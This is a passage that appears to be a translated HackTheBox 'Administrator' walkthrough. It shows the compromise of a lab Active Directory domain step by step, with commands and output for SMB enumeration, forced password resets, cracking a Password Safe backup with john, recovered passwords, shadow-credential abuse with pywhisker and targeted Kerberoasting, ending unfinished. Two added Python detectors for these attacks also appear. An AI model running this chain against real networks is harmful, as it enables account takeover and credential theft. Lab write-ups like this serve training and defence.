Machine information
As in a real Windows penetration test, you start the Administrator box with credentials for the following account: Username: Olivia, Password: ichliebedich
Machine IP address
10.10.11.42
Scan the machine's ports
```
nmap -p- -T4 10.10.11.42 -Pn
```
Result:
```
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2024-12-02 03:37 EST
Initiating Parallel DNS resolution of 1 host. at 03:37
Completed Parallel DNS resolution of 1 host. at 03:37, 0.00s elapsed
Initiating SYN Stealth Scan at 03:37
Scanning 10.10.11.42 [65535 ports]
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 445/tcp on 10.10.11.42
SYN Stealth Scan Timing: About 4.78% done; ETC: 03:48 (0:10:17 remaining)
Discovered open port 49667/tcp on 10.10.11.42
SYN Stealth Scan Timing: About 5.24% done; ETC: 03:56 (0:18:23 remaining)
Increasing send delay for 10.10.11.42 from 0 to 5 due to max_successful_tryno increase to 5
SYN Stealth Scan Timing: About 5.45% done; ETC: 04:05 (0:26:18 remaining)
Increasing send delay for 10.10.11.42 from 5 to 10 due to max_successful_tryno increase to 6
Warning: 10.10.11.42 giving up on port because retransmission cap hit (6).
SYN Stealth Scan Timing: About 6.08% done; ETC: 04:10 (0:31:08 remaining)
Discovered open port 58139/tcp on 10.10.11.42
Discovered open port 53482/tcp on 10.10.11.42
SYN Stealth Scan Timing: About 7.20% done; ETC: 04:13 (0:33:05 remaining)
SYN Stealth Scan Timing: About 8.98% done; ETC: 04:16 (0:35:07 remaining)
Discovered open port 49668/tcp on 10.10.11.42
SYN Stealth Scan Timing: About 10.00% done; ETC: 04:18 (0:37:03 remaining)
Discovered open port 593/tcp on 10.10.11.42
```
The machine information provides an account, so try it against SMB and enumerate the users
```
└─# crackmapexec smb 10.10.11.42 -u Olivia -p 'ichliebedich' --users
SMB  10.10.11.42  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.42  445  DC  [+] administrator.htb\Olivia:ichliebedich
SMB  10.10.11.42  445  DC  [+] Enumerated domain user(s)
SMB  10.10.11.42  445  DC  administrator.htb\foobanizer     badpwdcount: 1 desc:
SMB  10.10.11.42  445  DC  administrator.htb\emma           badpwdcount: 1 desc:
SMB  10.10.11.42  445  DC  administrator.htb\alexander      badpwdcount: 1 desc:
SMB  10.10.11.42  445  DC  administrator.htb\ethan          badpwdcount: 1 desc:
SMB  10.10.11.42  445  DC  administrator.htb\emily          badpwdcount: 0 desc:
SMB  10.10.11.42  445  DC  administrator.htb\benjamin       badpwdcount: 0 desc:
SMB  10.10.11.42  445  DC  administrator.htb\michael        badpwdcount: 0 desc:
SMB  10.10.11.42  445  DC  administrator.htb\olivia         badpwdcount: 0 desc:
SMB  10.10.11.42  445  DC  administrator.htb\krbtgt         badpwdcount: 1 desc: Key Distribution Center Service Account
SMB  10.10.11.42  445  DC  administrator.htb\Guest          badpwdcount: 1 desc: Built-in account for guest access to the computer/domain
SMB  10.10.11.42  445  DC  administrator.htb\Administrator  badpwdcount: 1 desc: Built-in account for administering the computer/domain
```
Log in to WinRM with the account from the machine information
```
evil-winrm -u Olivia -p 'ichliebedich' -i 10.10.11.42
```
Use netexec to collect BloodHound data for the domain
```
netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
```
So we can change michael's password
```
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael 123456
net.exe : The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.
    + CategoryInfo          : NotSpecified: (The password do...y requirements.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMS
net user michael aA123456
The command completed successfully. <----------------
*Evil-WinRM* PS C:\Users\olivia\Documents>
```
Log in as the michael user and change benjamin's password
```
net rpc password benjamin Password123! -U administrator.htb/michael%Password123! -S 10.10.11.42
ftp 10.10.11.42
```
Here we change benjamin's password, then log in to FTP directly with benjamin's username and password
It contains a Backup.psafe3 file. Got it!
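On the defender's side, the two resets above show up on the domain controller as Security event 4724 when account-management auditing is enabled. The following added example (not part of the original write-up) flags resets made by accounts outside an allowlist and links them into chains; the sample records, their timestamps and the `helpdesk01` allowlist entry are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records shaped like Security event 4724
# ("An attempt was made to reset an account's password").
# Timestamps and the helpdesk01 account are invented for this example.
RESET_EVENTS = [
    {"EventID": 4724, "TimeCreated": "2024-12-02T08:05:11",
     "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "TimeCreated": "2024-12-02T08:09:40",
     "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 4724, "TimeCreated": "2024-12-02T09:30:00",
     "SubjectUserName": "helpdesk01", "TargetUserName": "emma"},
    {"EventID": 4624, "TimeCreated": "2024-12-02T08:10:02",
     "SubjectUserName": "-", "TargetUserName": "benjamin"},
]
AUTHORIZED_RESETTERS = {"helpdesk01"}  # hypothetical allowlist


def unauthorized_resets(events, allow=AUTHORIZED_RESETTERS):
    """Return (time, subject, target) for resets made by non-allowlisted accounts."""
    hits = []
    for e in events:
        if e.get("EventID") != 4724:
            continue
        subj = e["SubjectUserName"].lower()
        tgt = e["TargetUserName"].lower()
        if subj != tgt and subj not in allow:
            hits.append((datetime.fromisoformat(e["TimeCreated"]), subj, tgt))
    return sorted(hits)


def reset_chains(events, window=timedelta(hours=1)):
    """Link resets where a freshly reset account goes on to reset the next one."""
    resets = unauthorized_resets(events)
    chains = []
    for i, (when, subj, tgt) in enumerate(resets):
        chain, last = [subj, tgt], when
        for when2, subj2, tgt2 in resets[i + 1:]:
            if subj2 == chain[-1] and when2 - last <= window:
                chain.append(tgt2)
                last = when2
        if len(chain) > 2:  # at least two hops
            chains.append(chain)
    return chains


if __name__ == "__main__":
    for chain in reset_chains(RESET_EVENTS):
        print("password-reset chain:", " -> ".join(chain))
```

A chain of three or more hops also reports its shorter tails, so deduplicate before alerting.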
```python
#!/usr/bin/env python

# pwsafe2john processes input Password Safe files into a format suitable
# for use with JtR.
#
# This software is Copyright (c) 2012, Dhiru Kholia <dhiru at openwall.com>,
# and it is hereby released to the general public under the following terms:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# Password Safe file format is documented at,
# http://keybox.rubyforge.org/password-safe-db-format.html
#
# formatV3.txt at http://passwordsafe.svn.sourceforge.net/viewvc/passwordsafe/trunk/pwsafe/pwsafe/docs/
#
# Output Format: filename:$passwordsaf$*version*salt*iterations*hash */

import os
import struct
import sys
from binascii import hexlify

magic = b"PWS3"  # bytes, so the comparison also works on Python 3


def process_file(filename):
    with open(filename, "rb") as f:
        data = f.read(4)
        if data != magic:
            sys.stderr.write("%s : PWS3 magic string missing, is this a Password Safe file?\n" % filename)
            return
        buf = f.read(32)  # 32-byte salt
        if len(buf) != 32:
            sys.stderr.write("Error: salt read failed.\n")
            return
        # ITER is stored as a 32-bit little-endian value in the V3 format
        iterations = struct.unpack("<I", f.read(4))[0]
        # rstrip() removes a set of characters rather than a suffix, which is
        # why "Backup.psafe3" is labelled "Backu" in the output
        sys.stdout.write("%s:$pwsafe$*3*" % os.path.basename(filename).rstrip(".psafe3"))
        sys.stdout.write(hexlify(buf).decode("ascii"))
        sys.stdout.write("*%s*" % iterations)
        hsh = f.read(32)  # stretched-key hash H(P')
        if len(hsh) != 32:
            sys.stderr.write("Error: hash read failed.\n")
            return
        sys.stdout.write(hexlify(hsh).decode("ascii"))
        sys.stdout.write("\n")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.stdout.write("Usage: pwsafe2john [.psafe3 files]\n")
        sys.exit(-1)

    for i in range(1, len(sys.argv)):
        process_file(sys.argv[i])
```
You can use the script, or run the command, to crack the file and obtain the Backup.psafe3 password
```
pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
```
Crack this hash
```
┌──(root㉿Bill-Gates)-[~/Desktop/HackTheBox-VPN]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
1g 0:00:00:00 DONE (2024-12-02 08:28) 2.325g/s 11088p/s 11088c/s 11088C/s venus..1029384756
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Opening the backup, you can find three accounts
```
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
```
You can log in with the emily account
```
evil-winrm -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -i 10.10.11.42
```
Find the user flag
```
c0ac1ee1e798423fe9001e225cc343f3
```
```
└─# pywhisker -d 10.10.11.42 -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2c3fc5be-9540-8af3-44bc-2079d57b2410
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: ur15yRu5.pfx
[*] Must be used with password: 9N0klMy2fgOGcAeMyPtD
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```
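The write to `msDS-KeyCredentialLink` shown in the output above is recorded as Security event 5136 when directory-service change auditing and a matching SACL are in place. The following added example (not part of the original write-up) flags additions to that attribute made by anyone other than the device itself or an allowlisted service account; the sample records, the `WS01` computer and the `msol_sync` allowlist entry are constructed assumptions.

```python
import re

VALUE_ADDED = "%%14674"          # 5136 OperationType for "Value Added"
TRUSTED_WRITERS = {"msol_sync"}  # hypothetical sync/service account allowlist

# Constructed sample records shaped like Security event 5136
# ("A directory service object was modified"); WS01 is invented.
DS_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "WS01$", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "description",
     "OperationType": VALUE_ADDED},
]


def first_cn(dn):
    """Return the leading CN value of a DN, allowing escaped characters."""
    m = re.match(r"CN=((?:\\.|[^,\\])+)", dn, re.I)
    return m.group(1) if m else ""


def key_credential_findings(events, trusted=TRUSTED_WRITERS):
    """Flag key-credential additions not made by the object itself or a trusted writer."""
    findings = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("OperationType") != VALUE_ADDED:
            continue
        if e.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
            continue
        writer = e["SubjectUserName"].lower()
        # A device registering its own key writes to its own computer object.
        self_write = (e.get("ObjectClass") == "computer"
                      and writer.rstrip("$") == first_cn(e["ObjectDN"]).lower())
        if self_write or writer in trusted:
            continue
        severity = "high" if e.get("ObjectClass") == "user" else "medium"
        findings.append({"writer": writer, "target": e["ObjectDN"], "severity": severity})
    return findings


if __name__ == "__main__":
    for f in key_credential_findings(DS_EVENTS):
        print("%(severity)s: %(writer)s added a key credential to %(target)s" % f)
```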
Output the TGT key
```
targetedKerberoast.py -v -d '10.10.11.42' -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
```
Not finished yet :)
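Originally published on the WeChat official account (Gh0xE9): Administrator target machine walkthrough - this article comes from the strongest, greatest, most awesome, most badass, toughest, best-earning in the universe, Litang's Strongest Legend and Fierce Tiger, the Pure-Hearted Ding Ichiro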